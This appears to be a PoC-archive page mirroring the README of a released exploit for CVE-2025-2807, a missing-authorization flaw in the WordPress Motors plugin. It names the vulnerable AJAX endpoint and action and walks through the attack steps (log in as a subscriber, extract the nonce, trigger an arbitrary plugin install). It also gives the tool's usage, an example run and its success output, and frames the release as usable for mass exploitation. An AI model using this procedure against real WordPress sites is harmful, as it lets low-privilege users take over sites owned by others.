Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-2807 PoC — WordPress plugin Motors – Car Dealership & Classified Listings Plugin 安全漏洞

Source
Associated Vulnerability
Title:WordPress plugin Motors – Car Dealership & Classified Listings Plugin 安全漏洞 (CVE-2025-2807)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Motors – Car Dealership & Classified Listings Plugin 1.4.64及之前版本存在安全漏洞,该漏洞源于mvl_setup_wizard_install_plugin函数缺少权限
Description
Wordpress - Motors Plugin <= 1.4.64 - Arbitrary Plugin Installation Vulnerability
Readme

# CVE-2025-2807: Motors Plugin <= 1.4.64 - Arbitrary Plugin Installation Vulnerability

> **Exploit By:** Nxploited | Khaled Alenazi

---

## ⚠️ Vulnerability Summary

**Plugin:** Motors (<= 1.4.64)  
**Type:** Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation  
**Severity:** 8.8 (CVSS v3)  
**Discovered On:** 07 April 2025  
**VDP:** No

---

## 🔥 Exploit Impact

This vulnerability allows any **authenticated WordPress user (Subscriber+)** to install arbitrary plugins **without any proper authorization check**. 

Due to the lack of capability validation in the `mvl_setup_wizard_install_plugin` function, a low-privileged user can perform actions reserved for administrators.

> 📅 Expected to be mass-exploited due to its simplicity and critical impact.

---

## 🚫 Technical Details

- Vulnerable Endpoint: `/wp-admin/admin-ajax.php`
- Vulnerable Action: `mvl_setup_wizard_install_plugin`
- Access Level Required: **Subscriber+** (logged-in user)
- Core Issue: Missing `current_user_can('install_plugins')` or similar capability check


---

## 🚀 Exploit Script (Python)
This script:
1. Logs in as a subscriber
2. Extracts the required nonce (from HTML or JS)
3. Triggers the vulnerable AJAX call to install a plugin of your choice

---

## 📃 Usage
```bash
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]

Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME     Subscriber username
  -p, --password PASSWORD      Subscriber password
  -pn, --plugin PLUGIN         Plugin to install (default: contact-form-7)
```

---

## 🐞 Example Execution
```bash
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7
```

### Output:
```
[*] Logging in...
[+] Logged in successfully.
[*] Fetching setup wizard page...
[+] Found nonce in HTML: 428cdf8347
[*] Attempting to install plugin: contact-form-7
[+] Plugin installation request sent successfully!
[+] Response: {"success":true,"data":"Plugin succesfully activated"}
```

---



---

  
## ✨ Exploit by **Nxploited** (Khaled Alenazi)
File Snapshot

[4.0K] /data/pocs/a57f947dfc9babaf5d66665fbb9a739deee344b5 ├── [4.3K] CVE-2025-2807.py ├── [1.1K] LICENSE ├── [2.2K] README.md └── [ 24] requirements.txt 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.